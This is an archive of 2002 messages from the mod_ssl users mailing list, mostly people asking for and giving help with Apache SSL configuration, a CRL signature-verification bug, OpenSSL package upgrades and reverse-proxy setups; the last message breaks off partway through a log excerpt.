
From owner-modssl-users@modssl.org  Wed Jun 12 17:19:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03086; Wed, 12 Jun 2002 17:18:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA02954; Wed, 12 Jun 2002 17:17:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 788224CE778; Wed, 12 Jun 2002 17:17:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8AB052897D; Wed, 12 Jun 2002 17:11:46 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from MAIL2.trans-it.de id NAA19961; Wed, 12 Jun 2002 13:53:07 +0200 (MET DST)
Received: from [145.228.60.90] by MAIL2.ntmail.trans-it.net (NTMail 7.00.0018/LG0061.00.9518a920) with ESMTP id nnldmbaa for modssl-users@modssl.org; Wed, 12 Jun 2002 13:51:32 +0200
From: "Andre Steffens" 
To: "Apache mod_ssl" 
Subject: Apache2 with SSL doesn't start
Date: Wed, 12 Jun 2002 13:53:28 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Steffens" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I've installed Apache 2.0.36 with mod_ssl on Win2k. After I create a
certificate I now have the files test.cert and test.key.

I add the following lines to my httpd.conf File:

SSLMutex sem
SSLRandomSeed startup builtin
SSLSessionCache none

SSLLog logs/SSL.log
SSLLogLevel info


   SSLEngine On
   SSLCertificateFile conf/ssl/test.crt
   SSLCertificateKeyFile conf/ssl/test.key
   ...


But the Apache doesn't start! Someone who know what I've to do?

Thx Andre
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 17:19:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03095; Wed, 12 Jun 2002 17:18:48 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA02955; Wed, 12 Jun 2002 17:17:08 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 874C44CE788; Wed, 12 Jun 2002 17:17:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CA7F42898A; Wed, 12 Jun 2002 17:12:10 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id QAA29108; Wed, 12 Jun 2002 16:16:06 +0200 (MET DST)
Date: Wed, 12 Jun 2002 16:16:06 +0200 (MET DST)
Message-Id: <200206121416.QAA29108@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Invalid signature on CRL (PR#716)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Philippe Jourdain
Version: 2.8.8
OS: Linux & Windows
Submission from: (NULL) (62.23.37.12)


My case:

We have an AC with 2 public keys, one is used to sign our SmartCard certificate
and the other is used to sign the CRL according to the SmartCard certificate.
The DN is the same for the both keys but the Subject Key Identifier are
differents.
When you look into the certificat and the CRL, you have then two differents
Authority Key Identifier.
We are 100% X509v3 compliant in our certificate structure.

When I want to authenticate a Client certificate, I have this message : Invalid
signature on CRL.
I know Why.

In the pkg.sslmod/ssl_engine_kernel.c file, in the function
ssl_callback_SSLVerify_CRL() there is this part :
/*
* Verify the signature on this CRL
*/
if (X509_CRL_verify(crl, X509_get_pubkey(xs)) <= 0) 
{
ssl_log(s, SSL_LOG_WARN, "Invalid signature on CRL");
X509_STORE_CTX_set_error(ctx, X509_V_ERR_CRL_SIGNATURE_FAILURE);
X509_OBJECT_free_contents(&obj);
return FALSE;
}

I suppose that it means, You check the CRL signature with the AC who signed the
client certificate. Which is wrong in my case.
The X509v3 RFC allow to sign the CRL with another key (with same DN).

We are, maybe, the only in the world who are using this functionality but it's
in the STANDARD.

Because, I am not a C programmer and I have no skills in it, Can you help me ?
This feature could be in the next version of ModSSL. What do you think ?

We are the public PKI of the French health government.
We provide (give for FREE) certificate on smartcard for doctors and more.
There are more than 400 000 cards in action in FRANCE and most of our Hospitals
are using Apache/ModSSL/Openssl as webserver that's why is a real problem for
promoting the CPS's certificate.

Kind Regards,
Philippe JOURDAIN (mailto:p.jourdain@gip-cps.fr)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 17:20:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03128; Wed, 12 Jun 2002 17:19:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blade.devel.redhat.com id RAA03098; Wed, 12 Jun 2002 17:18:49 +0200 (MET DST)
Received: from blade.devel.redhat.com (localhost.localdomain [127.0.0.1])
	by blade.devel.redhat.com (8.12.3/8.12.3) with ESMTP id g5CFIVYO006369;
	Wed, 12 Jun 2002 11:18:31 -0400
Received: (from nalin@localhost)
	by blade.devel.redhat.com (8.12.3/8.12.3/Submit) id g5CFIUoi006367;
	Wed, 12 Jun 2002 11:18:30 -0400
Date: Wed, 12 Jun 2002 11:18:30 -0400
From: Nalin Dahyabhai 
To: modssl-users@modssl.org
Cc: John.Airey@rnib.org.uk
Subject: Re: RHL7.0 with openssl0.9.5a & 0.9.6
Message-ID: <20020612151830.GF6039@redhat.com>
References: <9B66BBD37D5DD411B8CE00508B69700F020671A0@pborolocal.rnib.org.uk> <200206101613.g5AGDCv27368@localhost.localdomain>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200206101613.g5AGDCv27368@localhost.localdomain>
User-Agent: Mutt/1.4i
X-Random-Fortune: Most of the fear that spoils our life comes from attacking difficulties before we get to them.  -- Dr. Frank Crane
Organization: Red Hat, Inc.
X-Department: OS Development
X-Disclaimer: I am not a spokesmodel.  Views expressed are my own.
X-Key-ID: 2537B551
X-Key-Fingerprint: 44D4 B47B 392A 7A64 1D72  08E2 236F 3E15 2537 B551
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nalin Dahyabhai 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Jun 10, 2002 at 04:13:12PM -0000, ben@foundmoney.com wrote:
> Well here's the situation. I need openssl 0.9.6 but I also need openssl 
> 0.9.5a. So RedHat came out with three packages:
> openssl-0.9.6 (refered to as 0.9.6)
> openssl-0.9.5a (refered to as 0.9.5a)
> openssl095a-0.9.5a (refered to as openssl095a)
> 
> Since you can't install two of the same package, they created the third one 
> so you can install both 0.9.6 and 0.9.5a. So in order for me to install 
> openssl-0.9.6 i had to install openssl095a so that the 0.9.5a didn't get 
> killed. But I had to forcibly install openssl095a since the files are owned 
> by the 0.9.5a package. So now we have openssl095a installed as well as 0.9.5a 
> which really doesn't make a big diff since they cover the same files. I then 
> installed 0.9.6 as an upgrade to 0.9.5a and that installed fine. So now I 
> have the libs for openssl 0.9.5a (openssl095a-0.9.5a-14) and openssl 0.9.6 
> (openssl-0.9.6-9) installed and the the walls have come tumbling down.

Basically you have one library, and you want both installed when you're
done, but RPM complains when you try to upgrade one without the other,
either because you're installing a package contains a file you already
have (openssl095a) or you're upgrading to a package which will remove
a needed library (openssl, where the library version is changed).

The best way to do this is to just upgrade both at the same time:
  rpm -Uvh openssl095a* openssl-*

Dependencies don't break, and everything should keep working.

HTH,

Nalin
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 19:10:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10451; Wed, 12 Jun 2002 19:09:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id TAA10439; Wed, 12 Jun 2002 19:09:01 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Wed, 12 Jun 2002 10:09:27 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Wed, 12 Jun 2002 10:08:53 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Wed, 12 Jun 2002 10:08:40 -0700
From: "Jeff Landers" 
To: 
Subject: Apache2 with ssl
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA10440
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

What is the recommended way of getting the ssl module for Apache2? Using the built in Apache2 SSL or using mod_ssl? I don't see a mod_ssl for Apache2 on the mod_ssl site.  Does anyone have experience with Apache2 and ssl?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 19:20:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA11212; Wed, 12 Jun 2002 19:19:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id TAA11150; Wed, 12 Jun 2002 19:18:25 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5CHEFn23944
	for ; Wed, 12 Jun 2002 13:14:15 -0400
Date: Wed, 12 Jun 2002 13:14:15 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache2 with ssl
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 12 Jun 2002, Jeff Landers wrote:

> What is the recommended way of getting the ssl module for Apache2? Using
> the built in Apache2 SSL or using mod_ssl? I don't see a mod_ssl for
> Apache2 on the mod_ssl site.  Does anyone have experience with Apache2
> and ssl?

There's no mod_ssl on the www.modssl.org for Apache 2.0 because the
builtin SSL with Apache2 *IS* mod_ssl.  Ralf donated it to the Apache
Software Foundation, and it ships with the main Apache distribution now.

The only catch is that there are no binaries of mod_ssl with the official
Apache2 binary distributions distributed from apache.org, so if you want
it, you'll probably have to compile it yourself.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 19:29:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA12170; Wed, 12 Jun 2002 19:28:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id TAA12085; Wed, 12 Jun 2002 19:27:16 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5CHN3v23952;
	Wed, 12 Jun 2002 13:23:03 -0400
Date: Wed, 12 Jun 2002 13:23:03 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Andre Steffens 
cc: Apache mod_ssl 
Subject: Re: Apache2 with SSL doesn't start
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 12 Jun 2002, Andre Steffens wrote:

> I've installed Apache 2.0.36 with mod_ssl on Win2k. After I create a
> certificate I now have the files test.cert and test.key.
> But the Apache doesn't start! Someone who know what I've to do?

What does the error log say?

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 22:47:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA23059; Wed, 12 Jun 2002 22:46:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id WAA23004; Wed, 12 Jun 2002 22:45:16 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Wed, 12 Jun 2002 22:48:03 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 12 Jun 2002 20:45:14 UT
Date: Wed, 12 Jun 2002 16:45:28 -0400
MIME-Version: 1.0
Subject: 2.0.36 win32 crash
Message-ID: <3D077AA8.30448.5E8EDA7@localhost>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 12 Jun 2002 20:48:03.0580 (UTC) FILETIME=[726783C0:01C21252]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I tried to following configuration, which I expected to work as per my 1.3.24 
envirnoment

    ErrorLog logs/error2.log
    CustomLog logs/access2.log common
    ProxyPass / https://my.securehost.com/
    ProxyPassReverse / https://my.securehost.com/

Apache then crashed in libapr.
This problem was resolved by adding SSLProxyEngine on for the virtual host 
in question.
If a call stack is desired, I can produce that, although I think it best to flag 
any "ProxyPass ... https:// ..." configuration as an error, if SSLProxyEngine 
is not set.
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 23:22:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA25251; Wed, 12 Jun 2002 23:21:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id XAA25202; Wed, 12 Jun 2002 23:20:36 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Wed, 12 Jun 2002 23:23:23 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 12 Jun 2002 21:20:35 UT
Date: Wed, 12 Jun 2002 17:20:48 -0400
MIME-Version: 1.0
Subject: rewrite on ssl request
Message-ID: <3D0782F0.19266.60948F9@localhost>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 12 Jun 2002 21:23:23.0984 (UTC) FILETIME=[62437D00:01C21257]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've tried to rewrite on an SSL request (testing for the env HTTPS==on), and 
I've had no success. rewrite.log seems to indicate that it doesn't know what 
the https environment is (even though this is an https request).
Is there any way to do a rewrite based on whether or not the request was an 
https requets? Any pointers would be greatly appreciated.
Aryeh
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 10:30:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA03597; Thu, 13 Jun 2002 10:29:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from amrum.isl.org id KAA03553; Thu, 13 Jun 2002 10:28:11 +0200 (MET DST)
Received: from hofmann_nt (babykrake.isl.uni-bremen.de [134.102.136.208])
	by amrum.isl.org (8.9.3/8.9.3) with ESMTP id KAA05687
	for ; Thu, 13 Jun 2002 10:28:06 +0200
From: "Kai Hofmann" 
Organization: ISL - Bremen
To: modssl-users@modssl.org
Date: Thu, 13 Jun 2002 10:28:06 +0200
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: 8BIT
Comments: Sender has elected to use 8-bit data in this message.
  If problems arise, refer to postmaster at sender's site.
Subject: Re: Apache2 with ssl
Message-ID: <3D0873B5.15950.50147F0@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Win32 (v3.12cDE)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kai Hofmann" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> What is the recommended way of getting the ssl module for Apache2? Using the built in Apache2 SSL or using mod_ssl? I don't see a mod_ssl for Apache2 on the mod_ssl site.  Does anyone have experience with Apache2 and ssl?

The buildin in is the official mod_ssl for apache 2 - as it looks to me!
The documentation is nearly identical to the www.modssl.org docs!

-- 
Institut für Seeverkehrswirtschaft und Logistik   http://www.isl.org/
Dipl.-Inform. Kai Hofmann                       mailto:hofmann@isl.org
Universitaetsallee GW1 Block A                   phone:+49 421 22096-83
D-28359 Bremen                                     fax:+49 421 22096-55
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 10:31:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA03658; Thu, 13 Jun 2002 10:30:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from amrum.isl.org id KAA03617; Thu, 13 Jun 2002 10:29:40 +0200 (MET DST)
Received: from hofmann_nt (babykrake.isl.uni-bremen.de [134.102.136.208])
	by amrum.isl.org (8.9.3/8.9.3) with ESMTP id KAA05788
	for ; Thu, 13 Jun 2002 10:29:34 +0200
From: "Kai Hofmann" 
Organization: ISL - Bremen
To: modssl-users@modssl.org
Date: Thu, 13 Jun 2002 10:29:35 +0200
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: 8BIT
Comments: Sender has elected to use 8-bit data in this message.
  If problems arise, refer to postmaster at sender's site.
Subject: Re: Testing SSLv3 Authentication
Message-ID: <3D08740E.9003.502A129@localhost>
In-reply-to: <3D07562D.8000307@sol-tec.it>
X-mailer: Pegasus Mail for Win32 (v3.12cDE)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kai Hofmann" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> How can I build the client certificate to install on the browser?
> Can I build a second client.crt and then sign it with the ca.crt?

Take a look at www.thwate.com under personal certificates - they are free!!!

-- 
Institut für Seeverkehrswirtschaft und Logistik   http://www.isl.org/
Dipl.-Inform. Kai Hofmann                       mailto:hofmann@isl.org
Universitaetsallee GW1 Block A                   phone:+49 421 22096-83
D-28359 Bremen                                     fax:+49 421 22096-55
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 11:02:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA05730; Thu, 13 Jun 2002 11:01:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail5.nc.rr.com id LAA05658; Thu, 13 Jun 2002 11:00:28 +0200 (MET DST)
Received: from mail pickup service by mail5.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 04:59:33 -0400
Received: from ncmx01.mgw.rr.com ([24.93.67.251]) by mail5.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.687.68);
	 Wed, 12 Jun 2002 08:32:37 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx01.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5CBqmbC020795
	for ; Wed, 12 Jun 2002 07:52:48 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id 8BB5F1950B; Wed, 12 Jun 2002 13:52:09 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 4A89519369
	for ; Wed, 12 Jun 2002 13:52:09 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA19868; Wed, 12 Jun 2002 13:51:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id NAA19828; Wed, 12 Jun 2002 13:50:16 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GXLCVQ00.6S4 for ; Wed, 12 Jun 2002
          12:50:14 +0100 
Message-ID: <3D073574.3060301@itaction.co.uk>
Date: Wed, 12 Jun 2002 12:50:12 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
References: <9B66BBD37D5DD411B8CE00508B69700F020671CC@pborolocal.rnib.org.uk>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

yes, i think thats whats happening - you need to review the website 
content you are pointing at. For this to work you can't have any 
absolute hrefs, and also the backend site may issue redirects, for these 
to work you need a ProxyPassReverse which will rewrite the Location: 
header on any redirects the backend site may send.

 For example:

ProxyPass /test    http://other.subdomain.ourdomain.com/
ProxyPassReverse /test  http://other.subdomain.ourdomain.com/

proxypassreverse unfortunately is not case insensitive, and the backend 
webserver may refer to itself canonically, so the location headers may 
have another hostname. Either fix up the backend webserver to match the 
proxypassreverse, or add extra proxypassreverse lines.

The most common cause of redirects is the / bug handlers of tomcat, and 
IIS which kick in if your url ends with / and that resolves to a 
directory, then the webserver looks up what the directoryindex script is 
(eg. index.html) and sends a redirect. This is something to do with 
early revision browser releases, I have no idea which ones or if it 
matters anymore.

Also note that mod_proxy got a big upgrade at apache release 1.3.23 that 
may help things along too in certain cases.

John.Airey@rnib.org.uk wrote:

>Sounds like you have some absolute links rather than relative links. You can
>also use
>proxypass /test https://other-subdomain.ourdomain.com
>
>If the data needs to be secured between the proxy and the destination
>server.
>
>-
>John Airey
>Internet systems support officer, ITCSD, Royal National Institute of the
>Blind,
>Bakewell Road, Peterborough PE2 6XU,
>Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk
>
>Is the statement 'There is no such thing as truth'  true?
>
>
>  
>
>>-----Original Message-----
>>From: Wim Godden [mailto:wim@godden.net]
>>Sent: 12 June 2002 11:06
>>To: modssl-users@modssl.org
>>Subject: Re: 1 certificate for several sites using redirection ?
>>
>>
>>proxypass /test http://other-subdomain.ourdomain.com
>>doesn't work properly... I get errors about the images being
>>insecure and all links
>>point to the wrong position.
>>
>>
>>Peter Viertel wrote:
>>
>>    
>>
>>>You could do that using reverse proxy, ie mod_proxy.
>>>Redirects are not going to help.
>>>
>>>Wim Godden wrote:
>>>
>>>      
>>>
>>>>Hi,
>>>>
>>>>I'd like to use a certificate to secure several of our
>>>>        
>>>>
>>subdomains...
>>    
>>
>>>>buying hundreds of certificates is simply too expensive.
>>>>Is there some way to do this :
>>>>
>>>>- Install certificate on secure.ourdomain.com
>>>>- Let people surf to
>>>>        
>>>>
>>>https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
>>>      
>>>
>at-ever-page.html
>  
>
>>>Thanks in advance.
>>>
>>>
>>>Greetings,
>>>
>>>Wim Godden
>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>
>>>      
>>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>    
>>
>
>--
>------
>Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande
>sites !
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>-
>
>NOTICE: The information contained in this email and any attachments is
>confidential and may be legally privileged. If you are not the
>intended recipient you are hereby notified that you must not use,
>disclose, distribute, copy, print or rely on this email's content. If
>you are not the intended recipient, please notify the sender
>immediately and then delete the email and any attachments from your
>system.
>
>RNIB has made strenuous efforts to ensure that emails and any
>attachments generated by its staff are free from viruses. However, it
>cannot accept any responsibility for any viruses which are
>transmitted. We therefore recommend you scan all attachments.
>
>Please note that the statements and views expressed in this email
>and any attachments are those of the author and do not necessarily
>represent those of RNIB.
>
>RNIB Registered Charity Number: 226227
>
>Website: http://www.rnib.org.uk
>
>14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
>find out all about it.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 12:04:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA09780; Thu, 13 Jun 2002 12:03:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fobos.proit.cz id MAA09759; Thu, 13 Jun 2002 12:02:56 +0200 (MET DST)
Received: from libor (libor.proit.cz [193.85.152.100])
	by fobos.proit.cz (8.12.1/8.12.1) with SMTP id g5DAFWdf014988
	for ; Thu, 13 Jun 2002 12:15:32 +0200 (MEST)
From: "Libor Bubik" 
To: 
Subject: client authentication
Date: Thu, 13 Jun 2002 11:59:13 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Libor Bubik" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We have problem with client authentication from some client.
On server side we use Apache 1.3.24 with mod_ssl 2.8.8.
All client use MS IE 5 or higher and MS Windows 98-2000.
>From some client is client authentication without problems, but from some
not.
I think, certificate on client is installed properly.

There is list from ssl logs:
[13/Jun/2002 11:18:18 11431] [info]  Requesting connection re-negotiation
